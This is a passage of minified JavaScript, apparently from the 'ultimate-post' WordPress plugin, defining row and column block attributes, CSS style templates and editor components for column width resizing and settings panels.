}"}]},rowWrapBorder:{type:"object",default:{openBorder:0,width:{top:2,right:2,bottom:2,left:2},color:"#dfdfdf"},style:[{selector:"{{ULTP}} > .ultp-row-wrapper"}]},rowWrapRadius:{type:"object",default:{openBorder:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4",type:"solid"},style:[{selector:"{{ULTP}} > .ultp-row-wrapper { border-radius: {{rowWrapRadius}};} \n            {{ULTP}} > .ultp-row-wrapper > .ultp-row-overlay { border-radius: {{rowWrapRadius}}; }"}]},rowWrapShadow:{type:"object",default:{openShadow:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4"},style:[{selector:"{{ULTP}} > .ultp-row-wrapper"}]},rowWrapHoverBorder:{type:"object",default:{openBorder:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4"},style:[{selector:"{{ULTP}} > .ultp-row-wrapper:hover"}]},rowWrapHoverRadius:{type:"object",default:{openBorder:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4",type:"solid"},style:[{selector:"{{ULTP}} > .ultp-row-wrapper:hover, \n            {{ULTP}} > .ultp-row-wrapper:hover > .ultp-row-overlay { border-radius: {{rowWrapHoverRadius}};}"}]},rowWrapHoverShadow:{type:"object",default:{openShadow:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4"},style:[{selector:"{{ULTP}} > .ultp-row-wrapper:hover"}]},rowTopShape:{type:"string",default:"empty"},rowTopGradientColor:{type:"object",default:{openColor:1,type:"color",color:"#CCCCCC"}},rowTopShapeWidth:{type:"object",default:{lg:""},style:[{selector:"{{ULTP}} > .ultp-row-wrapper > .ultp-shape-top > svg { width:calc({{rowTopShapeWidth}}% + 1.3px); }"}]},rowTopShapeHeight:{type:"object",default:{lg:""},style:[{selector:"{{ULTP}} > .ultp-row-wrapper > .ultp-shape-top > svg { height:{{rowTopShapeHeight}}px; } "}]},rowTopShapeFlip:{type:"boolean",default:!1,style:[{depends:[{key:"rowTopShapeFlip",condition:"==",value:!1}]},{depends:[{key:"rowTopShapeFlip",condition:"==",value:!0}],selector:"{{ULTP}} > .ultp-row-wrapper > .ultp-shape-top > svg { transform:rotateY(180deg); }"}]},rowTopShapeFront:{type:"boolean",default:!1,style:[{depends:[{key:"rowTopShapeFront",condition:"==",value:!1}]},{depends:[{key:"rowTopShapeFront",condition:"==",value:!0}],selector:"{{ULTP}} > .ultp-row-wrapper > .ultp-shape-top { z-index: 1; }"}]},rowTopShapeOffset:{type:"object",default:{lg:""},style:[{selector:"{{ULTP}} > .ultp-row-wrapper > .ultp-shape-top { top: {{rowTopShapeOffset}}px !important; }"}]},rowBtmShape:{type:"string",default:"empty"},rowBtmGradientColor:{type:"object",default:{openColor:1,type:"color",color:"#CCCCCC"}},rowBtmShapeWidth:{type:"object",default:{lg:""},style:[{selector:"{{ULTP}} > .ultp-row-wrapper > .ultp-shape-bottom > svg, \n            {{ULTP}} > .ultp-shape-bottom > svg { width: calc({{rowBtmShapeWidth}}% + 1.3px); }"}]},rowBtmShapeHeight:{type:"object",default:{lg:""},style:[{selector:"{{ULTP}} > .ultp-row-wrapper > .ultp-shape-bottom > svg { height: {{rowBtmShapeHeight}}px; }"}]},rowBtmShapeFlip:{type:"boolean",default:!1,style:[{depends:[{key:"rowBtmShapeFlip",condition:"==",value:!1}]},{depends:[{key:"rowBtmShapeFlip",condition:"==",value:!0}],selector:"{{ULTP}} > .ultp-row-wrapper > .ultp-shape-bottom > svg { transform: rotateY(180deg) rotate(180deg); }"}]},rowBtmShapeFront:{type:"boolean",default:!1,style:[{depends:[{key:"rowBtmShapeFront",condition:"==",value:!1}]},{depends:[{key:"rowBtmShapeFront",condition:"==",value:!0}],selector:"{{ULTP}} > .ultp-row-wrapper > .ultp-shape-bottom { z-index: 1; }"}]},rowBtmShapeOffset:{type:"object",default:{lg:""},style:[{selector:"{{ULTP}} > .ultp-row-wrapper > .ultp-shape-bottom { bottom: {{rowBtmShapeOffset}}px !important; }"}]},rowColor:{type:"string",default:"",style:[{selector:"{{ULTP}} > .ultp-row-wrapper { color:{{rowColor}} } "}]},rowLinkColor:{type:"string",default:"",style:[{selector:"{{ULTP}} > .ultp-row-wrapper a { color:{{rowLinkColor}} }"}]},rowLinkHover:{type:"string",default:"",style:[{selector:"{{ULTP}} > .ultp-row-wrapper a:hover { color:{{rowLinkHover}}; }"}]},rowTypo:{type:"object",default:{openTypography:0,size:{lg:16,unit:"px"},height:{lg:20,unit:"px"},decoration:"none",family:"",weight:700},style:[{selector:"{{ULTP}} > .ultp-row-wrapper"}]},rowStickyPosition:{type:"string",default:""},rowDisableSticky:{type:"boolean",default:!1,style:[{depends:[{key:"rowStickyPosition",condition:"!=",value:""}]}]},disableStickyRanges:{type:"string",default:"",style:[{depends:[{key:"rowDisableSticky",condition:"==",value:!0},{key:"rowStickyPosition",condition:"==",value:"row_scrollToStickyTop"}],selector:" @media (max-width: {{disableStickyRanges}}px) { .postx-page {{ULTP}} { position: static !important; } }"},{depends:[{key:"rowDisableSticky",condition:"==",value:!0},{key:"rowStickyPosition",condition:"==",value:"row_sticky"}],selector:" @media (max-width: {{disableStickyRanges}}px) { .postx-page {{ULTP}} { position: static !important; } }"}]},advanceId:{type:"string",default:""},advanceZindex:{type:"string",default:"",style:[{selector:"body {{ULTP}}.wp-block-ultimate-post-row {z-index:{{advanceZindex}} !important;}"}]},hideExtraLarge:{type:"boolean",default:!1,style:[{selector:"{{ULTP}} {display:none;}"}]},hideTablet:{type:"boolean",default:!1,style:[{selector:"{{ULTP}} {display:none;}"}]},hideMobile:{type:"boolean",default:!1,style:[{selector:"{{ULTP}} {display:none;}"}]},advanceCss:{type:"string",default:"",style:[{selector:""}]}}},91202:(e,t,l)=>{"use strict";l.d(t,{Z:()=>k});var o=l(87462),a=l(67294),i=l(53049),n=l(99838),r=l(59902),s=l(92637),p=l(55040),c=l(17898);const{__}=wp.i18n,{InspectorControls:u,InnerBlocks:d}=wp.blockEditor,{useState:m,useEffect:g,Fragment:y}=wp.element,{select:b,dispatch:v}=wp.data,{getBlockAttributes:h,getBlockRootClientId:f}=wp.data.select("core/block-editor");function k(e){const[t,l]=m(!1),[k,w]=m(""),[x]=(0,r.Z)(),{setAttributes:T,name:_,attributes:C,clientId:E,className:S,toggleSelection:P}=e,{previewImg:L,blockId:I,advanceId:B,columnWidth:U,columnOverlayImg:M,columnGutter:A}=C,H={setAttributes:T,name:_,attributes:C,clientId:E};g((()=>{const e=E.substr(0,6),t=h(f(E));I?I&&I!=e&&(t?.hasOwnProperty("ref")||(0,i.k0)()||t?.hasOwnProperty("theme")||T({blockId:e})):T({blockId:e})}),[E]);let N="";if(I&&(N=(0,n.Kh)(C,"ultimate-post/column",I,(0,i.k0)())),L)return(0,a.createElement)("img",{style:{marginTop:"0px",width:"420px"},src:L,alt:"preview-image"});const j=(e,t)=>{const l=t?parseFloat(parseFloat(t).toFixed(2)):parseFloat(parseFloat(e.target.value).toFixed(2)),o=l>U.lg?-(l-parseFloat(U.lg)):parseFloat(U.lg)-l;if(o){let e=b("core/block-editor").getNextBlockClientId(E);e||(e=b("core/block-editor").getPreviousBlockClientId(E)),T({columnWidth:Object.assign({},U,{lg:l})});const t=b("core/block-editor").getBlockAttributes(e);v("core/block-editor").updateBlockAttributes(e,{columnWidth:Object.assign({},t.columnWidth,{lg:(parseFloat(t.columnWidth.lg)+o).toFixed(2)})})}},Z=(e,t,l,o,a)=>{const i=k<95?a:0,n=l<95?a:0;e&&t&&(e.style.flexBasis=`calc(${k}% - ${i}px)`,t.style.flexBasis=`calc(${(parseFloat(l)+o).toFixed(2)}% - ${n}px)`,O(e,t,parseFloat(k).toFixed(2),(parseFloat(l)+o).toFixed(2)))},O=(e,t,l,o)=>{if(e&&t){const a=(0,i.fY)().querySelector(`#${e.id} > .wp-block-ultimate-post-column > .ultp-column-wrapper > .ultp-colwidth-next-temp`),n=(0,i.fY)().querySelector(`#${e.id} > .wp-block-ultimate-post-column > .ultp-column-wrapper > .ultp-colwidth-prev-temp`),r=(0,i.fY)().querySelector(`#${t.id} > .wp-block-ultimate-post-column > .ultp-column-wrapper > .ultp-colwidth-next-temp`),s=(0,i.fY)().querySelector(`#${t.id} > .wp-block-ultimate-post-column > .ultp-column-wrapper > .ultp-colwidth-prev-temp`);a&&(a.innerHTML=`${l}%`),n&&(n.innerHTML=`${l}%`),r&&(r.innerHTML=`${o}%`),s&&(s.innerHTML=`${o}%`)}},R=b("core/block-editor").getBlockOrder(E).length>0,D=b("core/block-editor").getBlockParents(E),z=b("core/block-editor").getBlockAttributes(D[D.length-1])?.layout,F=b("core/block-editor").getBlockAttributes(D[D.length-1]),W=F?.columnGap,V={};["lg","sm","xs"].forEach((e=>{const t=z[e]?.filter((e=>100!=e)).length;V[e]=t&&U[e]<95&&0!=W[e]&&W[e]?W[e]*(t-1)/t:0})),JSON.stringify(V)!=JSON.stringify(A)&&T({columnGutter:V});const G=(0,i.fY)().querySelector(`#block-${E}`);G&&G.setAttribute("data-ultp",`.ultp-block-${I}`);const q=G?.parentNode?.offsetWidth,$=b("core/block-editor").getPreviousBlockClientId(E),K=b("core/block-editor").getNextBlockClientId(E),J=(0,i.fY)().querySelector(`#block-${E}`),Y=(0,i.fY)().querySelector(`#block-${K}`),X=b("core/block-editor").getBlockAttributes(K)?.columnWidth.lg,Q=k>U.lg?-(k-parseFloat(U.lg)):parseFloat(U.lg)-k;let ee=85;if(2==z?.lg.length&&!$&&K)t?Z(J,Y,X,Q,V[x]):O(J,Y,U.lg,X,V[x]);else if(3==z?.lg.length){if(!$&&K){const e=b("core/block-editor").getNextBlockClientId(K),t=e?b("core/block-editor").getBlockAttributes(e)?.columnWidth.lg:15;ee=85-parseFloat(t)}else if($&&K){const e=b("core/block-editor").getBlockAttributes($);ee=85-parseFloat(e.columnWidth.lg)}t?Z(J,Y,X,Q,V[x]):O(J,Y,U.lg,X,V[x])}return(0,a.createElement)(y,null,(0,a.createElement)(u,null,(0,a.createElement)(s.Sections,null,(0,a.createElement)(s.Section,{slug:"setting",title:__("Settings","ultimate-post")},"lg"==x&&z?.lg.length>1&&z?.lg.length<4&&($||!$)&&K&&U.lg<100&&(0,a.createElement)("div",{className:"ultp-field-wrap ultp-field-range ultp-field-columnwidth"},(0,a.createElement)("label",null,"Column Width"),(0,a.createElement)("div",{className:"ultp-range-control"},(0,a.createElement)("div",{className:"ultp-range-input"},(0,a.createElement)("input",{type:"range",min:15,max:ee,value:U.lg,step:.01,onChange:e=>{j(e)}}),(0,a.createElement)("input",{type:"number",min:15,max:ee,value:U.lg,step:.01,onChange:e=>{j(e)}})))),(0,a.createElement)(c.Z,{store:H})),(0,a.createElement)(s.Section,{slug:"advanced",title:__("Advanced","ultimate-post")},(0,a.createElement)(i.T,{title:__("General","ultimate-post"),include:[{position:1,data:{type:"text",key:"advanceId",label:__("ID","ultimate-post")}},{position:2,data:{type:"range",key:"advanceZindex",min:-100,max:1e4,step:1,label:__("z-index","ultimate-post")}},{position:3,data:{type:"select",key:"columnOverflow",label:__("Overflow","ultimate-post"),options:[{value:"visible",label:__("Visible","ultimate-post")},{value:"hidden",label:__("Hidden","ultimate-post")}]}},{position:4,data:{type:"toggle",key:"columnEnableLink",label:__("Enable Wrapper Link","ultimate-post")}},{position:5,data:{type:"text",key:"columnWrapperLink",label:__("Url","ultimate-post")}},{position:6,data:{type:"toggle",key:"columnTargetLink",label:__("Enable Target Blank","ultimate-post")}}],initialOpen:!0,store:H}),(0,a.createElement)(i.Mg,{store:H}),(0,a.createElement)(i.iv,{store:H})))),(0,a.createElement)("div",(0,o.Z)({},B&&{id:B},{className:`ultp-block-${I} ${S} ${R?"":"no-inner-block"}`}),N&&(0,a.createElement)("style",{dangerouslySetInnerHTML:{__html:N}}),(0,a.createElement)("div",{className:"ultp-column-wrapper"},1==M.openColor&&(0,a.createElement)("div",{className:"ultp-column-overlay"}),$&&100!=U.lg&&"lg"==x&&z?.lg.length>1&&z?.lg.length<4&&(0,a.createElement)("span",{className:"ultp-colwidth-tooltip ultp-colwidth-prev ultp-colwidth-prev-temp"},U[x],"%"),(0,a.createElement)(d,{templateLock:!1,renderAppender:R?void 0:()=>(0,a.createElement)(d.ButtonBlockAppender,null)}),K&&100!=U.lg&&"lg"==x&&z?.lg.length>1&&z?.lg.length<4&&(0,a.createElement)("span",{className:"ultp-colwidth-tooltip ultp-colwidth-next ultp-colwidth-next-temp"},U[x],"%"))),"lg"==x&&z?.lg.length>1&&z?.lg.length<4&&($||!$)&&K&&U.lg<100&&(0,a.createElement)("div",{className:"ultp-resizer-container",style:{width:q}},(0,a.createElement)(p.t,{position:"right",setLengthFunc:(e,t,o)=>{const a=(0,i.fY)().querySelector(`#block-${E}`),n=a?.parentNode?.offsetWidth,r=b("core/block-editor").getNextBlockClientId(E),s=(0,i.fY)().querySelector(`#block-${r}`),p=parseFloat(e)+parseFloat(100*t/n);j("event",p),a&&s&&(a.removeAttribute("style"),s.removeAttribute("style")),l(!1)},stateHandle:(e,t,o)=>{const a=(0,i.fY)().querySelector(`#block-${E}`)?.parentNode?.offsetWidth,n=parseFloat(e)+parseFloat(100*t/a);l(!0),w(parseFloat(n).toFixed(2))},unit:"%",previousLength:U.lg,toggleSelection:P,minWidth:15,maxWidth:ee||85})))}},70234:(e,t,l)=>{"use strict";l.d(t,{Z:()=>n});var o=l(87462),a=l(67294);const{InnerBlocks:i}=wp.blockEditor;function n(e){const{blockId:t,advanceId:l,columnEnableLink:n,columnWrapperLink:r,columnTargetLink:s,columnOverlayImg:p}=e.attributes;return(0,a.createElement)("div",(0,o.Z)({},l&&{id:l},{className:`ultp-block-${t}`}),(0,a.createElement)("div",{className:"ultp-column-wrapper"},n&&(0,a.createElement)("a",{className:"ultp-column-link",target:s?"_blank":"_self",href:`${r}`}),1==p.openColor&&(0,a.createElement)("div",{className:"ultp-column-overlay"}),(0,a.createElement)(i.Content,null)))}},17898:(e,t,l)=>{"use strict";l.d(t,{Z:()=>i});var o=l(67294),a=l(53049);const{__}=wp.i18n,i=e=>{const{store:t}=e;return(0,o.createElement)(o.Fragment,null,(0,o.createElement)(a.T,{title:__("Column Item","ultimate-post"),include:[{position:1,data:{type:"tag",key:"columnOrderNumber",options:[{value:"1",label:__("1","ultimate-post")},{value:"2",label:__("2","ultimate-post")},{value:"3",label:__("3","ultimate-post")},{value:"4",label:__("4","ultimate-post")},{value:"5",label:__("5","ultimate-post")},{value:"6",label:__("6","ultimate-post")}],label:__("Column Order","ultimate-post")}},{position:3,data:{type:"range",key:"columnHeight",min:0,max:1300,step:1,unit:["px","%","vh","rem"],responsive:!0,label:__("Min Height","ultimate-post")}},{position:6,data:{type:"group",key:"columnDirection",justify:!0,options:[{value:"column",label:__("Vertical","ultimate-post")},{value:"row",label:__("Horizontal","ultimate-post")}],label:__("Flex Direction","ultimate-post")}},{position:4,data:{type:"alignment",key:"columnJustify",disableJustify:!0,responsive:!0,icons:["juststart","justcenter","justend","justbetween","justaround","justevenly"],options:["flex-start","center","flex-end","space-between","space-around","space-evenly"],label:__("Inside Alignment ( Horizontal )","ultimate-post")}},{position:5,data:{type:"alignment",block:"column-column",key:"columnAlign",disableJustify:!0,icons:["algnStart","algnCenter","algnEnd","stretch"],options:["flex-start","center","flex-end","space-between"],label:__("Inside Content Alignment ( Vertical )","ultimate-post")}},{position:5,data:{type:"alignment",block:"column-column",key:"columnAlignItems",disableJustify:!0,icons:["algnStart","algnCenter","algnEnd"],options:["flex-start","center","flex-end"],label:__("Inside Items Alignment","ultimate-post")}},{position:7,data:{type:"range",key:"columnItemGap",min:0,max:300,step:1,responsive:!1,label:__("Gap","ultimate-post")}},{position:8,data:{type:"group",key:"columnWrap",justify:!0,options:[{value:"no",label:__("No","ultimate-post")},{value:"wrap",label:__("Wrap","ultimate-post")},{value:"nowrap",label:__("No Wrap","ultimate-post")}],label:__("Column Wrap","ultimate-post")}},{position:9,data:{type:"toggle",key:"reverseCol",label:__("Reverse","ultimate-post")}}],initialOpen:!0,store:t}),(0,o.createElement)(a.T,{title:__("Background & Wrapper","ultimate-post"),include:[{position:1,data:{type:"tab",content:[{name:"normal",title:__("Normal","ultimate-post"),options:[{type:"color2",key:"colBgImg",image:!0,label:__("Background","ultimate-post")}]},{name:"hover",title:__("Hover","ultimate-post"),options:[{type:"color2",key:"columnWrapHoverImg",image:!0,label:__("Background","ultimate-post")}]}]}}],initialOpen:!1,store:t}),(0,o.createElement)(a.T,{title:__("Background Overlay","ultimate-post"),include:[{position:1,data:{type:"tab",content:[{name:"normal",title:__("Normal","ultimate-post"),options:[{type:"color2",key:"columnOverlayImg",image:!0,label:__("Background","ultimate-post")},{type:"range",key:"colOverlayOpacity",min:0,max:100,step:1,responsive:!1,unit:!1,label:__("Opacity","ultimate-post")},{type:"filter",key:"columnOverlayilter",label:__("CSS Filter","ultimate-post")},{type:"select",key:"columnOverlayBlend",options:[{value:"",label:__("Select","ultimate-post")},{value:"normal",label:__("Normal","ultimate-post")},{value:"multiply",label:__("Multiply","ultimate-post")},{value:"screen",label:__("Screen","ultimate-post")},{value:"overlay",label:__("Overlay","ultimate-post")},{value:"darken",label:__("Darken","ultimate-post")},{value:"lighten",label:__("Lighten","ultimate-post")},{value:"color-dodge",label:__("Color Dodge","ultimate-post")},{value:"color-burn",label:__("Color Burn","ultimate-post")},{value:"hard-light",label:__("Hard Light","ultimate-post")},{value:"soft-light",label:__("Soft Light","ultimate-post")},{value:"difference",label:__("Difference","ultimate-post")},{value:"exclusion",label:__("Exclusion","ultimate-post")},{value:"hue",label:__("Hue","ultimate-post")},{value:"saturation",label:__("Saturation","ultimate-post")},{value:"luminosity",label:__("Luminosity","ultimate-post")},{value:"color",label:__("Color","ultimate-post")}],help:"Notice: Background Color Requierd",label:__("Blend Mode","ultimate-post")}]},{name:"hover",title:__("Hover","ultimate-post"),options:[{type:"color2",key:"columnOverlaypHoverImg",image:!0,label:__("Background","ultimate-post")},{type:"range",key:"colOverlayHovOpacity",min:0,max:100,step:1,responsive:!1,unit:!1,label:__("Opacity","ultimate-post")},{type:"filter",key:"columnOverlayHoverFilter",label:__("CSS Filter","ultimate-post")},{type:"select",key:"columnOverlayHoverBlend",options:[{value:"",label:__("Select","ultimate-post")},{value:"normal",label:__("Normal","ultimate-post")},{value:"multiply",label:__("Multiply","ultimate-post")},{value:"screen",label:__("Screen","ultimate-post")},{value:"overlay",label:__("Overlay","ultimate-post")},{value:"darken",label:__("Darken","ultimate-post")},{value:"lighten",label:__("Lighten","ultimate-post")},{value:"color-dodge",label:__("Color Dodge","ultimate-post")},{value:"color-burn",label:__("Color Burn","ultimate-post")},{value:"hard-light",label:__("Hard Light","ultimate-post")},{value:"soft-light",label:__("Soft Light","ultimate-post")},{value:"difference",label:__("Difference","ultimate-post")},{value:"exclusion",label:__("Exclusion","ultimate-post")},{value:"hue",label:__("Hue","ultimate-post")},{value:"saturation",label:__("Saturation","ultimate-post")},{value:"luminosity",label:__("Luminosity","ultimate-post")},{value:"color",label:__("Color","ultimate-post")}],help:"Notice: Background Color Requierd",label:__("Blend Mode","ultimate-post")}]}]}}],initialOpen:!1,store:t}),(0,o.createElement)(a.T,{title:__("Spacing & Border Style","ultimate-post"),include:[{position:1,data:{type:"dimension",key:"colWrapMargin",step:1,unit:!0,responsive:!0,label:__("Margin","ultimate-post")}},{position:2,data:{type:"dimension",key:"colWrapPadding",step:1,unit:!0,responsive:!0,label:__("Padding","ultimate-post")}},{position:3,data:{type:"tab",content:[{name:"normal",title:__("Normal","ultimate-post"),options:[{type:"border",key:"columnWrapBorder",label:__("Border","ultimate-post")},{type:"dimension",key:"columnWrapRadius",step:1,unit:!0,responsive:!0,label:__("Border Radius","ultimate-post")},{type:"boxshadow",key:"columnWrapShadow",step:1,unit:!0,responsive:!0,label:__("Box shadow","ultimate-post")}]},{name:"hover",title:__("Hover","ultimate-post"),options:[{type:"border",key:"columnWrapHoverBorder",label:__("Border","ultimate-post")},{type:"dimension",key:"columnWrapHoverRadius",step:1,unit:!0,responsive:!0,label:__("Border Radius","ultimate-post")},{type:"boxshadow",key:"columnWrapHoverShadow",step:1,unit:!0,responsive:!0,label:__("Box shadow","ultimate-post")}]}]}}],store:t}),(0,o.createElement)(a.T,{title:__("Column Color","ultimate-post"),include:[{position:1,data:{type:"color",key:"columnColor",label:__("Color","ultimate-post")}},{position:2,data:{type:"color",key:"colLinkColor",label:__("Link Color","ultimate-post")}},{position:3,data:{type:"color",key:"colLinkHover",label:__("Link Hover Color","ultimate-post")}},{position:4,data:{type:"typography",key:"colTypo",label:__("Typography","ultimate-post")}}],store:t}),(0,o.createElement)(a.T,{depend:"columnSticky",title:__("Sticky Column","ultimate-post"),include:[{position:7,data:{type:"range",key:"columnStickyOffset",min:0,max:300,step:1,unit:["px","rem","vh"],responsive:!0,help:"Note: Sticky Column Working only Front End",label:__("Gap","ultimate-post")}}],initialOpen:!1,store:t}))}},52:(e,t,l)=>{"use strict";l.d(t,{Z:()=>o});const o={blockId:{type:"string",default:""},previewImg:{type:"string",default:""},columnOrderNumber:{type:"string",default:"",style:[{selector:'[data-ultp="{{ULTP}}"], \n            .ultp-row-content > {{ULTP}} { order:{{columnOrderNumber}}; }'}]},columnGutter:{type:"object",default:{lg:"0",sm:"0",xs:"0"}},columnWidth:{type:"object",default:{},anotherKey:"columnGutter",style:[{selector:'[data-ultp="{{ULTP}}"], \n            .ultp-row-content > {{ULTP}} { flex-basis: calc({{columnWidth}} - {{columnGutter}}px);}'}]},columnHeight:{type:"object",default:{lg:"",ulg:"px",unit:"px"},style:[{selector:"{{ULTP}} > .ultp-column-wrapper > .block-editor-inner-blocks > .block-editor-block-list__layout, \n            .ultp-row-content > {{ULTP}} > .ultp-column-wrapper { min-height: {{columnHeight}};}"}]},columnDirection:{type:"string",default:"column",style:[{depends:[{key:"columnDirection",condition:"==",value:"row"}],selector:"{{ULTP}} > .ultp-column-wrapper > .block-editor-inner-blocks > .block-editor-block-list__layout, \n                .ultp-row-content > {{ULTP}} > .ultp-column-wrapper  { display: flex; flex-direction: {{columnDirection}} }"},{depends:[{key:"columnDirection",condition:"==",value:"column"}],selector:"{{ULTP}} > .ultp-column-wrapper > .block-editor-inner-blocks > .block-editor-block-list__layout, \n                .ultp-row-content > {{ULTP}} > .ultp-column-wrapper { display: flex;  flex-direction: column;}"},{depends:[{key:"reverseCol",condition:"==",value:!0},{key:"columnDirection",condition:"==",value:"row"}],selector:"{{ULTP}} > .ultp-column-wrapper > .block-editor-inner-blocks > .block-editor-block-list__layout, \n                .ultp-row-content > {{ULTP}} > .ultp-column-wrapper { display: flex; flex-direction: row-reverse; }"},{depends:[{key:"reverseCol",condition:"==",value:!0},{key:"columnDirection",condition:"==",value:"column"}],selector:"{{ULTP}} > .ultp-column-wrapper > .block-editor-inner-blocks > .block-editor-block-list__layout, \n                .ultp-row-content > {{ULTP}} > .ultp-column-wrapper  { display: flex; flex-direction: column-reverse; }"}]},columnJustify:{type:"object",default:{lg:""},style:[{depends:[{key:"columnDirection",condition:"==",value:"row"}],selector:"{{ULTP}} > .ultp-column-wrapper > .block-editor-inner-blocks > .block-editor-block-list__layout, \n                .ultp-row-content > {{ULTP}} > .ultp-column-wrapper { justify-content: {{columnJustify}}; }"}]},columnAlign:{type:"string",default:"",style:[{depends:[{key:"columnDirection",condition:"==",value:"row"}],selector:"{{ULTP}} > .ultp-column-wrapper > .block-editor-inner-blocks > .block-editor-block-list__layout, \n                .ultp-row-content > {{ULTP}} > .ultp-column-wrapper  { align-content: {{columnAlign}}; }"},{depends:[{key:"columnDirection",condition:"==",value:"column"}],selector:"{{ULTP}} > .ultp-column-wrapper > .block-editor-inner-blocks > .block-editor-block-list__layout, \n                .ultp-row-content > {{ULTP}} > .ultp-column-wrapper  { justify-content: {{columnAlign}}; }"}]},columnAlignItems:{type:"string",default:"",style:[{depends:[{key:"columnDirection",condition:"==",value:"row"}],selector:"{{ULTP}} > .ultp-column-wrapper > .block-editor-inner-blocks > .block-editor-block-list__layout, \n                .ultp-row-content > {{ULTP}} > .ultp-column-wrapper  { align-items: {{columnAlignItems}}; }"}]},columnItemGap:{type:"string",default:"",style:[{depends:[{key:"columnDirection",condition:"==",value:"row"}],selector:"{{ULTP}} > .ultp-column-wrapper > .block-editor-inner-blocks > .block-editor-block-list__layout, \n                .ultp-row-content > {{ULTP}} > .ultp-column-wrapper  { gap: {{columnItemGap}}px; }"}]},columnWrap:{type:"string",default:"wrap",style:[{depends:[{key:"columnWrap",condition:"==",value:"no"},{key:"columnDirection",condition:"==",value:"row"}],selector:"{{ULTP}} > .ultp-column-wrapper > .block-editor-inner-blocks > .block-editor-block-list__layout, \n                .ultp-row-content > {{ULTP}} { flex-wrap: unset; }"},{depends:[{key:"columnWrap",condition:"==",value:"wrap"},{key:"columnDirection",condition:"==",value:"row"}],selector:"{{ULTP}} > .ultp-column-wrapper > .block-editor-inner-blocks > .block-editor-block-list__layout, \n                .ultp-row-content > {{ULTP}} > .ultp-column-wrapper { flex-wrap: {{columnWrap}}; }"},{depends:[{key:"columnWrap",condition:"==",value:"nowrap"},{key:"columnDirection",condition:"==",value:"row"}],selector:"{{ULTP}} > .ultp-column-wrapper > .block-editor-inner-blocks > .block-editor-block-list__layout, \n                .ultp-row-content > {{ULTP}} > .ultp-column-wrapper { flex-wrap: nowrap; }"}]},reverseCol:{type:"boolean",default:!1},colBgImg:{type:"object",default:{openColor:0,type:"color",color:"#f5f5f5",size:"cover",repeat:"no-repeat"},style:[{selector:"{{ULTP}} > .ultp-column-wrapper"}]},columnWrapHoverImg:{type:"object",default:{openColor:0,type:"color",color:"#f5f5f5",size:"cover",repeat:"no-repeat"},style:[{selector:"{{ULTP}} > .ultp-column-wrapper:hover"}]},columnOverlayImg:{type:"object",default:{openColor:0,type:"color",color:"#f5f5f5",size:"cover",repeat:"no-repeat"},style:[{selector:"{{ULTP}} > .ultp-column-wrapper > .ultp-column-overlay"}]},colOverlayOpacity:{type:"string",default:"50",style:[{selector:"{{ULTP}} > .ultp-column-wrapper > .ultp-column-overlay { opacity: {{colOverlayOpacity}}%; }"}]},columnOverlayilter:{type:"object",default:{openFilter:0},style:[{selector:"{{ULTP}} > .ultp-column-wrapper > .ultp-column-overlay { {{columnOverlayilter}} }"}]},columnOverlayBlend:{type:"string",default:"",style:[{selector:"{{ULTP}} > .ultp-column-wrapper > .ultp-column-overlay { mix-blend-mode:{{columnOverlayBlend}}; }"}]},columnOverlaypHoverImg:{type:"object",default:{openColor:0,type:"color",color:"#f5f5f5",size:"cover",repeat:"no-repeat"},style:[{selector:"{{ULTP}} > .ultp-column-wrapper:hover > .ultp-column-overlay"}]},colOverlayHovOpacity:{type:"string",default:"50",style:[{selector:"{{ULTP}} > .ultp-column-wrapper:hover > .ultp-column-overlay { opacity: {{colOverlayHovOpacity}}%; }"}]},columnOverlayHoverFilter:{type:"object",default:{openFilter:0},style:[{selector:"{{ULTP}} > .ultp-column-wrapper:hover > .ultp-column-overlay { {{columnOverlayHoverFilter}} }"}]},columnOverlayHoverBlend:{type:"string",default:"",style:[{selector:"{{ULTP}} > .ultp-column-wrapper:hover > .ultp-column-overlay { mix-blend-mode:{{columnOverlayHoverBlend}}; }"}]},colWrapMargin:{type:"object",default:{lg:{top:"",bottom:"",unit:"px"}},style:[{selector:"{{ULTP}} > .ultp-column-wrapper { margin: {{colWrapMargin}}; }"}]},colWrapPadding:{type:"object",default:{lg:{top:"0",bottom:"0",left:"0",right:"0",unit:"px"}},style:[{selector:"{{ULTP}} > .ultp-column-wrapper { padding: {{colWrapPadding}}; }"}]},columnWrapBorder:{type:"object",default:{openBorder:0,width:{top:1,right:1,bottom:1,left:1},color:"#505050"},style:[{selector:"{{ULTP}} > .ultp-column-wrapper"}]},columnWrapRadius:{type:"object",default:{openBorder:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4",type:"solid"},style:[{selector:"{{ULTP}} > .ultp-column-wrapper { border-radius: {{columnWrapRadius}};}"}]},columnWrapShadow:{type:"object",default:{openShadow:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4"},style:[{selector:"{{ULTP}} > .ultp-column-wrapper"}]},columnWrapHoverBorder:{type:"object",default:{openBorder:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4"},style:[{selector:'[data-ultp="{{ULTP}}"]:hover > {{ULTP}} > .ultp-column-wrapper, \n            .ultp-row-content > {{ULTP}}:hover > .ultp-column-wrapper'}]},columnWrapHoverRadius:{type:"object",default:{openBorder:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4",type:"solid"},style:[{selector:'[data-ultp="{{ULTP}}"]:hover > {{ULTP}} > .ultp-column-wrapper, \n            .ultp-row-content > {{ULTP}}:hover > .ultp-column-wrapper { border-radius: {{columnWrapHoverRadius}};}'}]},columnWrapHoverShadow:{type:"object",default:{openShadow:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4"},style:[{selector:'[data-ultp="{{ULTP}}"]:hover > {{ULTP}} > .ultp-column-wrapper, \n            .ultp-row-content > {{ULTP}}:hover > .ultp-column-wrapper'}]},columnColor:{type:"string",default:"",style:[{selector:"{{ULTP}} { color: {{columnColor}} } "}]},colLinkColor:{type:"string",default:"",style:[{selector:"{{ULTP}} > .ultp-column-wrapper a { color: {{colLinkColor}} } "}]},colLinkHover:{type:"string",default:"",style:[{selector:"{{ULTP}} > .ultp-column-wrapper a:hover { color: {{colLinkHover}}; } 